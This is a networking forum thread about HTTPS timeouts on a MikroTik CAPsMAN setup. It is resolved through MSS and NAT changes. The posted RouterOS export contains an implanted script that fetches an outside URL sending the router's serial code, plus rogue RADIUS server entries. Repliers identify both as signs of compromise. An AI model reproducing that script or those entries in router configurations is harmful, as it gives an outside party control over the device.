Some HTTPS web sites won't work!

Hi everyone,
I really hope someone here will help to solve this issue. I have recently set up CAPsMAN for one of my client. His antenna (RB RXT) acts as a router and wifi-aps are set as bridges (2x RB 951G)

Client’s devices won’t show certain sites. I suspected that this could be some sort of MTU issue but that doesn’t seem to be the case since he has MTU sizes on bridges set to 1500.
DNS servers should be working fine and I don’t have any special Filter rules that could cause the issues.

I have tried

  1. rebooting CAPsMAN server and CAPsMAN radios - doesn’t work
  2. downgrading/upgrading RouterOS on all devices -doesn’t work
  3. all devices can PING and TRACEROUTE to all the websites without problem
  4. If I try to connect to the site via web-browser it will print “connection time out”
  5. I’ve tried to add a mangel rule as suggested in similar topics (see export below) - doesn’t work
  6. ftp and tcp connections works just fine
  7. his IP isn’t blocked by ISP/Site and there’s no blocking on ports either

at this point i’m really lost as I’ve never dealt with this before. I hope that someone here may give me advice. Also if you find an issue with my configuration please add some explanation to your responce for future refence. Thank you very much. If you need more info, do please..ask!

EXPORT:

jun/25/2018 17:33:26 by RouterOS 6.42.4

software id = BMRD-B7FI

model = SXT 5nD r2

serial number = XXXXXXXXXXXX

/interface bridge
add fast-forward=no mtu=1520 name=bridge1 protocol-mode=none
add fast-forward=no mtu=1520 name=bridge2-deti protocol-mode=none
/interface wireless
set [ find default-name=wlan1 ] band=5ghz-a/n country=“czech republic”
disabled=no ssid=XXXXXX-super-secret-ssid
/caps-man configuration
add country=“czech republic” datapath.bridge=bridge1 mode=ap name=cfg1
security.authentication-types=wpa-psk,wpa2-psk security.encryption=
aes-ccm,tkip ssid=CP361
add country=“czech republic” datapath.bridge=bridge2-deti mode=ap name=
cfg2-deti security.authentication-types=wpa-psk,wpa2-psk
security.encryption=aes-ccm,tkip ssid=CP361-deti
/caps-man interface
add configuration=cfg1 disabled=no l2mtu=1600 mac-address=CC:2D:E0:3B:BB:C5
master-interface=none name=cap-garaz radio-mac=CC:2D:E0:3B:BB:C5
add configuration=cfg2-deti disabled=no l2mtu=1600 mac-address=
CE:2D:E0:3B:BB:C5 master-interface=cap-garaz name=cap-garaz-deti radio-mac=
00:00:00:00:00:00
add configuration=cfg1 disabled=no l2mtu=1600 mac-address=CC:2D:E0:17:E8:30
master-interface=none name=cap-podkrovi radio-mac=CC:2D:E0:17:E8:30
add configuration=cfg2-deti disabled=no l2mtu=1600 mac-address=
CE:2D:E0:17:E8:30 master-interface=cap-podkrovi name=cap-podkrovi-deti
radio-mac=00:00:00:00:00:00
/interface wireless channels
add band=2ghz-b/g/n frequency=2412 list=channels name=ch1 width=20
add band=2ghz-b/g/n frequency=2417 list=channels name=ch2 width=20
add band=2ghz-b/g/n frequency=2422 list=channels name=ch3 width=20
add band=2ghz-b/g/n frequency=2427 list=channels name=ch4 width=20
add band=2ghz-b/g/n frequency=2432 list=channels name=ch5 width=20
add band=2ghz-b/g/n frequency=2437 list=channels name=ch6 width=20
add band=2ghz-b/g/n frequency=2442 list=channels name=ch7 width=20
add band=2ghz-b/g/n frequency=2447 list=channels name=ch8 width=20
add band=2ghz-b/g/n frequency=2452 list=channels name=ch9 width=20
add band=2ghz-b/g/n frequency=2457 list=channels name=ch10 width=20
add band=2ghz-b/g/n frequency=2462 list=channels name=ch11 width=20
add band=2ghz-b/g/n frequency=2467 list=channels name=ch12 width=20
add band=2ghz-b/g/n frequency=2472 list=channels name=ch13 width=20
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool1 ranges=192.168.10.100-192.168.10.200
add name=pool1 ranges=10.1.1.2-10.1.1.250
add name=dhcp_pool6 ranges=192.168.11.100-192.168.11.200
/ip dhcp-server
add address-pool=dhcp_pool1 authoritative=after-2sec-delay disabled=no
interface=bridge1 lease-time=1w name=dhcp1
add address-pool=dhcp_pool6 disabled=no interface=bridge2-deti lease-time=1w
name=dhcp2
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test
remote-address=pool1 use-encryption=yes
/queue simple
add disabled=yes name=ap-podkrovi target=192.168.10.2/32
add disabled=yes name=ap-garaz target=192.168.10.3/32
add burst-limit=10M/25M burst-threshold=1M/8M burst-time=2m/2m disabled=yes
max-limit=2M/10M name=deti target=192.168.11.0/24
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/caps-man manager
set enabled=yes
/interface bridge port
add bridge=bridge1 hw=no interface=ether1
/ip firewall connection tracking
set tcp-close-timeout=15s tcp-time-wait-timeout=15s
/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes max-mru=1500
max-mtu=1500
/ip address
add address=10.5.52.195/27 interface=wlan1 network=10.5.52.192
add address=192.168.10.1/24 interface=bridge1 network=192.168.10.0
add address=192.168.11.1/24 interface=bridge2-deti network=192.168.11.0
add address=86.63.210.213 interface=wlan1 network=86.6X.XX.XX
/ip dhcp-server network
add address=192.168.10.0/24 dns-server=8.8.8.8,10.1.255.1 gateway=192.168.10.1
add address=192.168.11.0/24 dns-server=8.8.8.8,10.1.255.1 gateway=192.168.11.1
/ip dns
set servers=10.1.255.1
/ip firewall mangle
add action=change-mss chain=postrouting comment=
“Clamp MSS to PMTU for Outgoing packets” disabled=yes new-mss=clamp-to-pmtu
out-interface=wlan1 passthrough=yes protocol=tcp tcp-flags=syn
add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn
tcp-mss=1361-65535
/ip firewall nat
add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=86.6X.XX.XX
add action=dst-nat chain=dstnat disabled=yes dst-port=80 in-interface=wlan1
protocol=tcp to-addresses=192.168.10.0/24 to-ports=80
add action=dst-nat chain=dstnat dst-port=1194 in-interface=wlan1 protocol=udp
to-addresses=192.168.10.22
add action=dst-nat chain=dstnat dst-port=8088 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.240
add action=dst-nat chain=dstnat dst-port=8888 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=20 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=21 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=20256 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20256 in-interface=wlan1 protocol=udp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20257 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20257 in-interface=wlan1 protocol=udp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20000 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20000 in-interface=wlan1 protocol=udp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=502 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=502 in-interface=wlan1 protocol=udp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=25573 in-interface=wlan1 protocol=tcp
to-addresses=192.168.10.10
add action=dst-nat chain=dstnat comment=wifi-podkrovi dst-port=8080
in-interface=wlan1 protocol=tcp src-address=10.1.255.0/24 to-addresses=
192.168.10.2 to-ports=8291
add action=dst-nat chain=dstnat comment=wifi-garaz dst-port=8081 in-interface=
wlan1 protocol=tcp src-address=10.1.255.0/24 to-addresses=192.168.10.3
to-ports=8291
add action=masquerade chain=srcnat disabled=yes out-interface=wlan1
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set pptp disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=10.5.52.193
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
/radius incoming
set accept=yes
/system clock
set time-zone-name=Europe/Prague
/system identity
set name=pecinovsky-jan
/system leds
set 0 interface=wlan1
/system logging
add topics=debug,caps
add topics=debug,dhcp
/system routerboard settings
set silent-boot=no
/system script
add name=ip owner=admin policy=
reboot,read,write,policy,test,password,sniff,sensitive source=“{/tool fetch
url=("http://www.boss-ip.com/Core/Update.ashx\?key=85454d8bb84998fa&actio
n=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&dynamic=static")}”

/ip firewall mangle
add out-interface=YOUR_WAN_INTERFACE protocol=tcp tcp-flags=syn action=change-mss new-mss=1300 chain=forward tcp-mss=1301-65535


Try this on router, and see if its helps. Does your ISP use pppoe’? Then you need to change MTU

Hello,

your router seems to have been attacked, check this :

/system script
add name=ip owner=admin policy=
reboot,read,write,policy,test,password,sniff,sensitive source=“{/tool fetch
url=("http://www.boss-ip.com/Core/Update.ashx … 98fa&actio
n=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&dynamic=static")}”

You should upgrade to the latest stable version and change your password.

Regards,

yes I’ve since noticed it and deleted it. I’ve also blocked access to a router so this should’n cause problem anymore. But thank you for your advice.

I’ve tried your firewall rule and it still times out when trying to connect to a site.

Onto your next question, I’m ISP and we don’t use pppoe and as I’ve said before all MTU are 1500 or higher on every interface.
I’m really at my wit’s end here. I don’t think that CAPsMAN could cause this because the PC I test web sites on is connected via Ethernet so CAPsMAN should’n
affect it in any way in my opinion.
I will be glad for any advice really.

In your configuration we can see :

add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn
tcp-mss=1361-65535

It shouldn’t work. And why did you set MTU 1520 to your bridges?

Then, your router is still compromised :

/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
/radius incoming
set accept=yes

It depends on your global peer - and how they treat mtu ingress and egress from your network (as long as you are 101% sure there is no problam inside). Your router have a problem - but that is “case” number2. Check DNS - and see that its working as expected.

I’ve already said I’ve removed radius and script and disabled every VPN servers that could be running.

  • I’ve set 1520 to bridges because I didn’t know what else to do. There is no problem with MTU sizes
  • firewall rules I’ve removed and put ones someone suggested in this forum. (still doesn’t work)

i’m baffled because no other client out of 5 000 doesn’t have this problem.

Thank you for your advice

So today I’ve noticed that same behaviour on clients CAPsMAN radios because when they’ve tried to autoupdate new packages they’ve printed out “connection time out”. So i’ve played a little bit with NAT and since our client have routed pub IP there has been only on NAT rule

see below

add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=XX.6X.XX.XXX

so I’ve added another rule and it doesn’t time out anymore. Does anyone have and idea why?

/ip firewall natadd action=masquerade chain=srcnat out-interface=wlan1
add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=XX.6X.XX.XXX

it WORKS !! Thank you!

It also worked for me. Any explanation for this?